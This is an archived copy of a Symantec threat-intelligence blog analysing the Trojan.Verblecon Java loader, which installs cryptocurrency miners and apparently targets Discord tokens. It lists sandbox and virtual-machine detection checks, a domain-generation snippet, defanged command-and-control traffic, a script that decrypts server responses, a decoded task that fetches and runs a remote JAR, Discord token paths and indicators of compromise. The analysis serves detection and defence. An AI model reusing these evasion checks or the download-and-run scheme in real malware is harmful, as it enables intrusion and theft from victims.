{
	"id": "a62dc27e-aa05-423f-b1ae-605161763637",
	"created_at": "2026-04-06T01:30:24.39385Z",
	"updated_at": "2026-04-10T13:11:50.376608Z",
	"deleted_at": null,
	"sha1_hash": "a25d33e26637b851a21cb2a8166bf285544470c5",
	"title": "Verblecon: Sophisticated New Loader Used in Low-level Attacks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 108678,
	"plain_text": "Verblecon: Sophisticated New Loader Used in Low-level Attacks\r\nBy About the Author\r\nArchived: 2026-04-06 01:09:44 UTC\r\nAn unknown attacker is using a complex and powerful new malware loader in relatively unsophisticated and low-reward\r\nattacks, indicating they may not realize the potential capabilities of the malware they are deploying.\r\nThe malware, Trojan.Verblecon, is being used in attacks that appear to have installing cryptocurrency miners on infected\r\nmachines as their end goal. There are some indications the attacker may also be interested in stealing access tokens for chat\r\napp Discord. However, the capabilities of this malware indicate that it could be highly dangerous if leveraged in ransomware\r\nor espionage campaigns.\r\nVerblecon was first spotted by analysts from Symantec, a division of Broadcom Software, in January 2022. This blog will\r\ndetail the capabilities of the malware.\r\nTechnical breakdown\r\nThe malware is loaded as a server-side polymorphic JAR file. The fact that the file is polymorphic means that, due to\r\nencryption and obfuscation, the code of the malware payload looks different each time it is downloaded. Attackers generally\r\npack malware in this way in an effort to evade detection by security software.\r\nThe malware samples analyzed by Symantec were fully obfuscated, in the code flow, strings, and symbols. The samples\r\nthemselves may be based on publicly available code.\r\nOnce started, the malware checks its command-line arguments. It requires at least one command-line argument to execute,\r\nwhich could be the infection or campaign ID initially e.g.\r\n\"CSIDL_SYSTEM_DRIVE\\program files\\java\\jre1.8.0_301\\bin\\javaw.exe\" -jar\r\n\"CSIDL_PROFILE\\appdata\\local\\temp\\rpvbh.jar\" masonkhonsari\r\nand\r\n\"CSIDL_SYSTEM_DRIVE\\program files\\java\\jre1.8.0_301\\bin\\javaw.exe\" -jar\r\n\"CSIDL_PROFILE\\appdata\\local\\temp\\rpvbh.jar\" 923ec15ffa4474ca7bf200bfb90e782d\r\nAdditionally, it also attempts to determine if its own process is being debugged by checking for the following Java\r\ncommand-line arguments:\r\n\"-xbootclasspath\"\r\n\"-xdebug\"\r\n\"-agentlib\"\r\n\"-javaagent:\"\r\n\"-xrun:\"\r\n\"-verbose\"\r\n\"-agentpath:\"\r\nNext, it attempts to detect if it is being opened in a virtual or sandbox environment, which would indicate it is likely being\r\nopened on a security researcher’s machine.\r\nFirst, it checks for the following directories:\r\n\"%ProgramFiles(X86)%\\VMware\\VMware Tools\"\r\n\"%ProgramFiles(X86)%\\Oracle\\VirtualBox Guest Additions\"\r\nIt also obtains the machine MAC address and attempts to check for the following prefixes, which may indicate the file is\r\nbeing opened on a virtual machine:\r\n\"00:05:69\"\r\n\"00:0C:29\"\r\n\"00:1C:14\"\r\n\"00:50:56\"\r\n\"08:00:27\"\r\n\"00:16:3E\"\r\n\"00:1C:42\"\r\n\"0A:00:27\"\r\nFollowing those checks, it executes the following command to obtain a list of running processes:\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/verblecon-sophisticated-malware-cryptocurrency-mining-discord\r\nPage 1 of 6\n\ntasklist.exe /fo csv /nh\r\nIt then appears to check these processes against a set list:\r\n\"vboxservice.exe\"\r\n\"vboxtray.exe\"\r\n\"xenservice.exe\"\r\n\"vmtoolsd.exe\"\r\n\"vmwaretray.exe\"\r\n\"vmwareuser.exe\"\r\n\"vgauthservice.exe\"\r\n\"vmacthlp.exe\"\r\n\"vmsrvc.exe\"\r\n\"vmusrvc.exe\"\r\n\"prl_cc.exe\"\r\n\"prl_tools.exe\"\r\n\"qemu-ga.exe\"\r\n\"vmcomputeagent.exe\"\r\n\"sandboxie\"\r\n\"vdagent\"\r\n\"vdservice\"\r\n\"fiddler\"\r\n\"joeboxserver.exe\"\r\n\"joeboxcontrol.exe\"\r\n\"blnsvr.exe\"\r\nIt then also checks for the following files:\r\n\"%Windows%\\system32\\windanr.exe\"\r\n\"%Windows%\\system32\\drivers\\VBoxMouse.sys\"\r\n\"%Windows%\\system32\\drivers\\VBoxGuest.sys\"\r\n\"%Windows%\\system32\\drivers\\VBoxSF.sys\"\r\n\"%Windows%\\system32\\drivers\\VBoxVideo.sys\"\r\n\"%Windows%\\system32\\vboxdisp.dll\"\r\n\"%Windows%\\system32\\vboxhook.dll\"\r\n\"%Windows%\\system32\\vboxmrxnp.dll\"\r\n\"%Windows%\\system32\\vboxogl.dll\"\r\n\"%Windows%\\system32\\vboxoglarrayspu.dll\"\r\n\"%Windows%\\system32\\vboxoglcrutil.dll\"\r\n\"%Windows%\\system32\\vboxoglerrorspu.dll\"\r\n\"%Windows%\\system32\\vboxoglfeedbackspu.dll\"\r\n\"%Windows%\\system32\\vboxoglpackspu.dll\"\r\n\"%Windows%\\system32\\vboxoglpassthroughspu.dll\"\r\n\"%Windows%\\system32\\vboxservice.exe\"\r\n\"%Windows%\\system32\\vboxtray.exe\"\r\n\"%Windows%\\system32\\VBoxControl.exe\"\r\n\"%Windows%\\system32\\Drivers\\Vmmouse.sys\"\r\n\"%Windows%\\system32\\Drivers\\vm3dgl.dll\"\r\n\"%Windows%\\system32\\Drivers\\vmdum.dll\"\r\n\"%Windows%\\system32\\Drivers\\vm3dver.dll\"\r\n\"%Windows%\\system32\\Drivers\\vmtray.dll\"\r\n\"%Windows%\\system32\\Drivers\\VMToolsHook.dll\"\r\n\"%Windows%\\system32\\Drivers\\vmmousever.dll\"\r\n\"%Windows%\\system32\\Drivers\\vmhgfs.dll\"\r\n\"%Windows%\\system32\\Drivers\\vmGuestLib.dll\"\r\n\"%Windows%\\system32\\Drivers\\VmGuestLibJava.dll\"\r\n\"%Windows%\\system32\\Driversvmhgfs.dll\"\r\n\"[java.lang.System.getProperty(\"user.home\")]\\Desktop\\moutonheart.wav\"\r\nNext, it appears to check the user name against the following:\r\njava.lang.System.getProperty(\"user.name\") == \"WDAGUtilityAccount\"\r\njava.lang.System.getProperty(\"user.name\").startsWith(\"hal-\")\r\nThen it executes the following command:\r\nreg query \"HKU\\S-1-5-19\"\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/verblecon-sophisticated-malware-cryptocurrency-mining-discord\r\nPage 2 of 6\n\nIt is unclear how the output is processed, however, there are some strings that could be related to this or other registry\r\nchecks:\r\n\"HARDWARE\\ACPI\\DSDT\\\"\r\n\"HARDWARE\\ACPI\\FADT\\\"\r\n\"HARDWARE\\ACPI\\RSDT\\\"\r\n\"SOFTWARE\\Oracle\\\"\r\n\"SYSTEM\\ControlSet001\\Services\\\"\r\n\"SYSTEM\\ControlSet001\\Services\\\"\r\n\"SOFTWARE\\Microsoft\\Virtual Machine\\Guest\\\"\r\n\"SOFTWARE\\VMware, Inc.\\\"\r\n\"SOFTWARE\\\"\r\n\"VBOX__\"\r\n\"VBOX__\"\r\n\"VirtualBox Guest Additions\"\r\n\"VBoxGuest\"\r\n\"VBoxMouse\"\r\n\"VBoxService\"\r\n\"VBoxSF\"\r\n\"VBoxVideo\"\r\n\"Parameters\"\r\n\"VMware Tools\"\r\n\"Wine\"\r\nIf satisfied with these checks, it may copy itself as one of the following files:\r\n\"%ProgramData%[INFECTION_ID][INFECTION_ID].jar\"\r\n\"%ALL_USERS_HOME%[INFECTION_ID][INFECTION_ID].jar\"\r\n\"%LOCALAPPDATA%[INFECTION_ID][INFECTION_ID].jar\"\r\nAnd then create one of the following files to use as a loadpoint:\r\n\"%HOMEPATH%\\Library\\LaunchAgents[INFECTION_ID].plist\"\r\n\"%Windows%\\System32\\Tasks[INFECTION_ID]\"\r\n[INFECTION_ID] is computed as follows:\r\nhashlib.md5(b\"%PROCESSOR_IDENTIFIER%%COMPUTERNAME%[USER_NAME]\").hexdigest()\r\nThen it periodically attempts to connect to the following URLs:\r\n\"hxxps://gaymers[.]ax/\"\r\n\"hxxp://[DGA_NAME][.]tk/\"\r\n[DGA_NAME] is apparently generated using the following method:\r\nimport datetime import hashlib def dga(day): seed = bytes(day.strftime(\"%Y-%m-%d\"), \"ascii\") + b\"verble\" md5 =\r\nhashlib.md5(seed) return md5.hexdigest() print(dga(datetime.date.today()))\r\nThe traffic generated by the malware looks like this:\r\nPOST / HTTP/1.1 User-Agent: VerbleConnectTM Content-Type: application/x-www-form-urlencoded charset: utf-8\r\nCache-Control: no-cache Pragma: no-cache Host: gaymers.ax Accept: text/html, image/gif, image/jpeg, *; q=.2,\r\n*/*; q=.2 Connection: keep-alive Content-Length: 2 k=\r\nThe server response appears as the below. Some of the strings in this response indicate that the attacker may be leveraging\r\nlegitimate Cloudflare infrastructure to host some of their C\u0026C infrastructure.\r\nHTTP/1.1 200 OK Date: Fri, 28 Jan 2022 21:27:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding:\r\nchunked Connection: keep-alive CF-Cache-Status: DYNAMIC Expect-CT: max-age=604800, report-uri=\"hxxps://report-uri[.]cloudflare.com/cdn-cgi/beacon/expect-ct\" Report-To: {\"endpoints\":\r\n[{\"url\":\"hxxps:\\/\\/a.nel.cloudflare[.]com\\/report\\/v3?\r\ns=IoiU38KEKgi24kr9QHrmWg%2F%2B7pJc7jkKFghTxjGEGnFLDYDVtn0jrsN5FVkZrQAb9XUJlyEAjfQM%2BZ%2FJVPN4wTrU6Otancwny335hs3uyGy6DoE%2B9nl8eKz9mdDr\"\r\nnel\",\"max_age\":604800} NEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800} Server: cloudflare CF-RAY: 6d4d4e246b68cdab-CDG alt-svc: h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400 3c0\r\nJ2dHYN2DE/N7JQj5ZdxyMVjISfLstuKFQjzMhEcxqaTQvAb3hpYZXlGHMn3mSoG3++twgiJEAjadSFco/P7qgd9mZz+4rzTksF23RJ0BsTRzH7Z2tAF0b62gwh+jTVgeupvenZoqw\r\n0\r\nThe server response body above is an encrypted blob that contains a URL signed with an RSA key. This blob can be\r\ndecrypted and validated as follows:\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/verblecon-sophisticated-malware-cryptocurrency-mining-discord\r\nPage 3 of 6\n\n#!/usr/bin/python3 import Crypto.Cipher.AES import Crypto.Hash.SHA256 import Crypto.PublicKey.RSA import\r\nCrypto.Signature.pkcs1_15 import Crypto.Util.Padding import base64 # from sample aes_key =\r\nb\"cYIoouG6CRk3ds6dZAfRdQOomHfxOFJ6\" aes_iv = b\"FjP2PQfztKZ7vKxL\" rsa_certificate =\r\n\"MIIFazCCA1OgAwIBAgIUQDUa4ddMSiYJ+8dB2v1yF6kfWsQwDQYJKoZIhvcNAQELBQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoMGEludGVy\r\ndef disect_response(body): decoded_body = base64.b64decode(body) cipher = Crypto.Cipher.AES.new(aes_key,\r\nCrypto.Cipher.AES.MODE_CBC, IV=aes_iv) decrypted_body = cipher.decrypt(decoded_body) signed_message =\r\nCrypto.Util.Padding.unpad(decrypted_body, cipher.block_size) message, signature = signed_message.rsplit(b\"@\")\r\nprint(\"message:\", message) print(\"signature:\", signature) rsa_public_key =\r\nCrypto.PublicKey.RSA.import_key(base64.b64decode(rsa_certificate)) rsa_verifier =\r\nCrypto.Signature.pkcs1_15.PKCS115_SigScheme(rsa_public_key) message_hash = Crypto.Hash.SHA256.new(message)\r\nrsa_verifier.verify(message_hash, base64.b64decode(signature)) print(\"signature verification: PASS\")\r\ndisect_response(\"J2dHYN2DE/N7JQj5ZdxyMVjISfLstuKFQjzMhEcxqaTQvAb3hpYZXlGHMn3mSoG3++twgiJEAjadSFco/P7qgd9mZz+4rzTksF23RJ0BsTRzH7Z2tAF0b62g\r\nThe malware then starts communicating with the decoded URL by sending details about the infected computer:\r\nPOST /mafia/login.php HTTP/1.1 User-Agent: VerbleConnectTM Content-Type: application/x-www-form-urlencoded\r\ncharset: utf-8 Cache-Control: no-cache Pragma: no-cache Host: gaymers.ax Accept: text/html, image/gif,\r\nimage/jpeg, *; q=.2, */*; q=.2 Connection: keep-alive Content-Length: 291\r\nid=il~aSS_3ZNaXHMGXLExSyzp6xMrxMB7zCw1zFndLA87jjqd0tPsFqY31LF65YGEt\u0026os=5i1E5v8J8fUqwpvNWkN6QQ\u0026pv=6qWqTXHlWudJmSz_fuWcBA\u0026ip=VfseCVZvINz5rC\r\nThe request body contains the following information about the infected machine in encrypted form:\r\n\"id\" is [INFECTION_ID\r\n\"os\" is OS version, e.g. \"Windows 10\"\r\n\"pv\" is \"Admin\" when running with Administrator privileges\r\n\"ip\" is JAR pathname\r\n\"cn\" is \"[USER_NAME]@[COMPUTERNAME]\"\r\n\"lr\" has value \"00:00:00\"\r\n\"ct\" has value \"0\"\r\n\"bv\" has value \"v1.0.0\"\r\nThe server has been observed to respond as follows:\r\nHTTP/1.1 200 OK Date: Fri, 28 Jan 2022 21:29:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding:\r\nchunked Connection: keep-alive CF-Cache-Status: DYNAMIC Expect-CT: max-age=604800, report-uri=\"hxxps://report-uri[.]cloudflare.com/cdn-cgi/beacon/expect-ct\" Report-To: {\"endpoints\":\r\n[{\"url\":\"hxxps:\\/\\/a.nel.cloudflare[.]com\\/report\\/v3?\r\ns=JE2u6s575flQq%2BEumTamotRln2IsYdLgqtQHy0tGJwQp9tuxhWThqxtCzsMG6vVgc%2Fa76jGYsP8hb68S3hKu8Q5lm6H2iIYElyVHw4WOcGSLqi%2FLR6AX5RcYlsXd\"}],\"\r\nnel\",\"max_age\":604800} NEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800} Server: cloudflare CF-RAY: 6d4d50f69c993a8d-CDG alt-svc: h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400 98\r\nRc0OiT8tzq68CmJ7bi0SMLtCQQH8bjxlid0OONwvn+x9g2ku8Ocfx+lT+TZXBzLC9/K7hJ/efOYWz9e1HC3KrRkQoh3OTZezXIOhJ6gTRPiLeqDgCGT79FcFqm7SFEDPHl1NpR14d\r\n0\r\nWhere the response body can be decrypted as follows:\r\nnewtask:1:Mw==:YUhSMGNITTZMeTlxYjI1aGRHaGhibWhoY21SM2FXTnJMbTFsTDJoaGNtUjNhV05yTG1waGNuNXpkR0Z5ZEE9PQ==\r\nThe last term above contains the following string:\r\nhxxps://jonathanhardwick[.]me/hardwick.jar~start\r\nSome samples of the malware are seen communicating with the following servers:\r\ngaymers[.]ax\r\n6f3af6ffb074513b51bba688a0b41df7[.]tk\r\nCommunication between the malware and servers is over HTTP or HTTPS and this communication appears to culminate\r\nwith victims being directed to connect to the following:\r\nPOST /mafia/login.php HTTP/1.1 User-Agent: VerbleConnectTM Content-Type: application/x-www-form-urlencoded\r\ncharset: utf-8 Cache-Control: no-cache Pragma: no-cache Host: gaymers.ax Accept: text/html, image/gif,\r\nimage/jpeg, *; q=.2, */*; q=.2 Connection: keep-alive Content-Length: 291\r\nid=il~aSS_3ZNaXHMGXLExSyzp6xMrxMB7zCw1zFndLA87jjqd0tPsFqY31LF65YGEt\u0026os=5i1E5v8J8fUqwpvNWkN6QQ\u0026pv=6qWqTXHlWudJmSz_fuWcBA\u0026ip=VfseCVZvINz5rC\r\nThe payload is downloaded from the URL observed earlier:\r\nhxxps://jonathanhardwick[.]me/hardwick.jar\r\nThe payload is obfuscated in a similar way to the other samples, and also contains similar techniques to detect the\r\nvirtualization environment, as well as other functionality.\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/verblecon-sophisticated-malware-cryptocurrency-mining-discord\r\nPage 4 of 6\n\nThe core functionality is to download and execute a binary blob from the following URL:\r\nhxxps://jonathanhardwick[.]me/hardwick.bin\r\nThe blob is decrypted along with *.bin artifacts from the same host. The downloaded blob is then cached on the local\r\nfilesystem (in re-encrypted form) and injected into %Windows%\\SysWow64\\dllhost.exe for execution.\r\nThe injection is performed using com.sun.jna and doesn't use usual APIs for injection.\r\nThe final payload (hardwick.bin) contains the following embedded URL pointing to a configuration file for a cryptocurrency\r\nminer:\r\nhxxps://jonathanhardwick[.]me/config[.]txt\r\nThis indicates that the purpose of this activity was to install cryptocurrency mining software on victim machines.\r\nWhat is the goal of this campaign?\r\nThe evidence found on victim networks appears to indicate that the goal of the attacker was to install cryptocurrency mining\r\nsoftware on victim machines. This would appear to be a relatively low-reward goal for the attacker given the level of effort\r\nthat would have been required to develop this sophisticated malware.\r\nThere are also indications that the attacker may be stealing Discord tokens and using these to advertise Trojanized\r\nvideogame applications.\r\nWe suspect they were stealing Discord tokens because some of the obfuscated strings refer to pathnames that are apparently\r\nrelated to Discord clients, specifically:\r\n\"AppData\\Roaming\\discordcanary\\Local Storage\\leveldb\"\r\n\"AppData\\Roaming\\discordptb\\Local Storage\\leveldb\"\r\n\"Library\\Application Support\\discord\\Local Storage\\leveldb\"\r\n\"Library\\Application Support\\discordcanary\\Local Storage\\leveldb\"\r\n\"Library\\Application Support\\discordptb\\Local Storage\\leveldb\"\r\n\".config\\discordcanary\\Local Storage\\leveldb\"\r\n\".config\\discordptb\\Local Storage\\leveldb\"\r\nDiscord is a group chatting app that is particularly popular among the gaming community. Advertising Trojanized\r\nvideogame applications via Discord is likely a redistribution channel for Trojan.Verblecon.\r\nCould this be used to distribute ransomware?    \r\nMost of the infections we saw where this malware was used were on non-enterprise machines; we rarely see ransomware\r\ndeployed on non-enterprise machines.\r\nPrevious reports have connected related domains to a single occurrence of ransomware, but the infrastructure may be shared\r\nwith an unrelated actor. The similarities between that incident and the activity we observed includes:\r\nThe use of “verble” in the domain name\r\nThe downloading of shellcode for execution\r\nSimilar obfuscation\r\nHowever, we do not have enough evidence to draw a definitive link between both these sets of activity.\r\nPower in the hands of an inexperienced actor?\r\nThe activity we have seen carried out using this sophisticated loader indicates that it is being wielded by an individual who\r\nmay not realize the capabilities of the malware they are using. However, if it fell into the hands of a more sophisticated actor\r\nthe potential is there for this loader to be used for more serious attacks, including potentially ransomware and espionage\r\ncampaigns.\r\nProtection\r\nFile-based\r\nTrojan.Verblecon\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nIndicators of Compromise (IoCs)\r\nIf an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/verblecon-sophisticated-malware-cryptocurrency-mining-discord\r\nPage 5 of 6\n\n32a9415daa7f37a93dd0b347461844673c0f5baf0c15c01ee48b147dadf28299\r\n3688c249774cc9a28d2b9b316921cec842bb087c57f4733cf5866226fbe2aeed\r\n5a4f6332ad08b35c055bb5e6dfddc79d2f7905e63fac7595efbedd0b27f12eb8\r\n007f5898c52c3aa1c3dca6d3a30f28f5f72d9789fbb440ae656d88959f68e53e\r\nf3f4af5f5eae1a28ad5a01b56d71302a265bce17d2c87ce731edf440612818a6\r\nhxxp://verble[.]software/styles.jar\r\nhxxps://jonathanhardwick[.]me/hardwick.jar\r\nhxxps://jonathanhardwick[.]me/hardwick.bin\r\nhxxps://jonathanhardwick[.]me/config.txt\r\nhxxp://test.verble[.]rocks/dorflersaladreviews.jar\r\nhxxp://test.verble[.]rocks/dorflersaladreviews.bin\r\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/verblecon-sophisticated-malware-cryptocurrency-mining-discord\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/verblecon-sophisticated-malware-cryptocurrency-mining-discord\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/verblecon-sophisticated-malware-cryptocurrency-mining-discord"
	],
	"report_names": [
		"verblecon-sophisticated-malware-cryptocurrency-mining-discord"
	],
	"threat_actors": [],
	"ts_created_at": 1775439024,
	"ts_updated_at": 1775826710,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a25d33e26637b851a21cb2a8166bf285544470c5.pdf",
		"text": "https://archive.orkl.eu/a25d33e26637b851a21cb2a8166bf285544470c5.txt",
		"img": "https://archive.orkl.eu/a25d33e26637b851a21cb2a8166bf285544470c5.jpg"
	}
}